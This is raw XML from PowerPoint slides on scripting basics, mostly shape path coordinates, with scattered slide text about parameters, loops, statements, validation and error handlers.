                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="228599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="17BE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392417" y="5933694"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="0" y="228599"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="228599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6263385" y="3460825"/>
            <a:ext cx="5320665" cy="1411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Paramet</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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p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650">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="834390">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="6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anc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7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loo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pi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7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sta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ements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85203" y="5973521"/>
            <a:ext cx="38550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Validation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error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handlers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56679" y="7182357"/>
            <a:ext cx="126301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25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15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sts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929127" y="4034028"/>
            <a:ext cx="2790825" cy="2790825"/>
            <a:chOff x="2929127" y="4034028"/>
            <a:chExt cx="2790825" cy="2790825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2929127" y="4034028"/>
              <a:ext cx="2790825" cy="2790825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2790825" h="2790825">
                  <a:moveTo>
                    <a:pt x="1395222" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1347259" y="809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299702" y="3219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252577" y="7203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1205909" y="12737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159725" y="19794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114050" y="28348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068911" y="38372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024334" y="49842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980344" y="62730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936968" y="77012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894231" y="92660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852160" y="109650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810780" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770117" y="147549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730198" y="168405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691049" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652695" y="213805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615162" y="238295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578477" y="263944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542665" y="290727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507752" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473764" y="347588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440728" y="377614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408670" y="408670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377614" y="440728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347588" y="473764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="507752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290727" y="542665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263944" y="578477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238295" y="615162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213805" y="652695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190499" y="691049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168405" y="730198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147549" y="770117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="810780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109650" y="852160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92660" y="894231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77012" y="936968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62730" y="980344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49842" y="1024334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38372" y="1068911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28348" y="1114050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19794" y="1159725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12737" y="1205909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7203" y="1252577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3219" y="1299702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809" y="1347259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1395222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809" y="1443184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3219" y="1490741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7203" y="1537866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12737" y="1584534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19794" y="1630718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28348" y="1676393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38372" y="1721532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49842" y="1766109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62730" y="1810099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77012" y="1853475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92660" y="1896212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109650" y="1938283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="1979663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147549" y="2020326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168405" y="2060245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="2099394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213805" y="2137748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238295" y="2175281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263944" y="2211966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290727" y="2247778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="2282691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347588" y="2316679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377614" y="2349715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408670" y="2381773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440728" y="2412829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473764" y="2442855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507752" y="2471826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542665" y="2499716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578477" y="2526499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615162" y="2552148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652695" y="2576638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691049" y="2599944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730198" y="2622038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770117" y="2642894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810780" y="2662488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852160" y="2680793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894231" y="2697783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936968" y="2713431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980344" y="2727713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024334" y="2740601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068911" y="2752071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114050" y="2762095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159725" y="2770649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1205909" y="2777706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252577" y="2783240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299702" y="2787224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347259" y="2789634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395222" y="2790444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443184" y="2789634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490741" y="2787224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537866" y="2783240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1584534" y="2777706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630718" y="2770649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676393" y="2762095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721532" y="2752071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1766109" y="2740601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1810099" y="2727713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853475" y="2713431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1896212" y="2697783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938283" y="2680793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979663" y="2662488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2020326" y="2642894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060245" y="2622038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099394" y="2599944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137748" y="2576638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2175281" y="2552148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2211966" y="2526499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2247778" y="2499716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2282691" y="2471826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316679" y="2442855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349715" y="2412829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381773" y="2381773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2412829" y="2349715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442855" y="2316679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471826" y="2282691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499716" y="2247778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526499" y="2211966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2552148" y="2175281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576638" y="2137748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2599944" y="2099394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2622038" y="2060245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642894" y="2020326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2662488" y="1979663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2680793" y="1938283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697783" y="1896212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2713431" y="1853475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2727713" y="1810099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2740601" y="1766109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2752071" y="1721532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762095" y="1676393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770649" y="1630718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2777706" y="1584534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783240" y="1537866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787224" y="1490741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789634" y="1443184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790444" y="1395222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789634" y="1347259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787224" y="1299702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783240" y="1252577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2777706" y="1205909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770649" y="1159725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762095" y="1114050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2752071" y="1068911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2740601" y="1024334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2727713" y="980344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2713431" y="936968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697783" y="894231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2680793" y="852160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2662488" y="810780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642894" y="770117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2622038" y="730198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2599943" y="691049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576638" y="652695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2552148" y="615162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526499" y="578477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499716" y="542665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471826" y="507752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442855" y="473764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2412829" y="440728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381773" y="408670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349715" y="377614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316679" y="347588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2282691" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2247778" y="290727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2211966" y="263944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2175281" y="238295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137748" y="213805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099394" y="190499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060245" y="168405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2020326" y="147549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979663" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938283" y="109650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1896212" y="92660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853475" y="77012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1810099" y="62730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1766109" y="49842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721532" y="38372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676393" y="28348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630718" y="19794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1584534" y="12737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537866" y="7203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490741" y="3219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443184" y="809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395222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9895" y="4925568"/>
              <a:ext cx="1170431" cy="11719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31456" y="306451"/>
            <a:ext cx="15951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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting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75347" y="760476"/>
            <a:ext cx="2267711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248146" y="1933193"/>
            <a:ext cx="4164329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Other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elements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scripting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are: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368793" y="3979417"/>
            <a:ext cx="1854200" cy="1854200"/>
            <a:chOff x="7368793" y="3979417"/>
            <a:chExt cx="1854200" cy="1854200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7381493" y="3992117"/>
              <a:ext cx="1828800" cy="1828800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1828800" h="1828800">
                  <a:moveTo>
                    <a:pt x="914400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="865842" y="1267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817944" y="5028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770768" y="11219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724379" y="19776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678839" y="30637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634211" y="43738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590559" y="59016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547945" y="76408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506434" y="95851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466088" y="117281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426971" y="140635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389146" y="165849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352675" y="192862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317623" y="221609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284053" y="252027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252027" y="284053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221609" y="317623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192862" y="352675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165849" y="389146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140635" y="426971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117281" y="466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95851" y="506434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76408" y="547945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59016" y="590559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43738" y="634211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30637" y="678839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19776" y="724379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11219" y="770768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5028" y="817944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267" y="865842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267" y="962957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5028" y="1010855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11219" y="1058031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19776" y="1104420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30637" y="1149960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43738" y="1194588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59016" y="1238240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76408" y="1280854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95851" y="1322365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117281" y="1362711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140635" y="1401828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165849" y="1439653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192862" y="1476124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221609" y="1511176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252027" y="1544746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284053" y="1576772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317623" y="1607190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352675" y="1635937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389146" y="1662950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426971" y="1688164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466088" y="1711518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506434" y="1732948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547945" y="1752391"/>
                  </a:lnTo>
                  <a:lnTo>
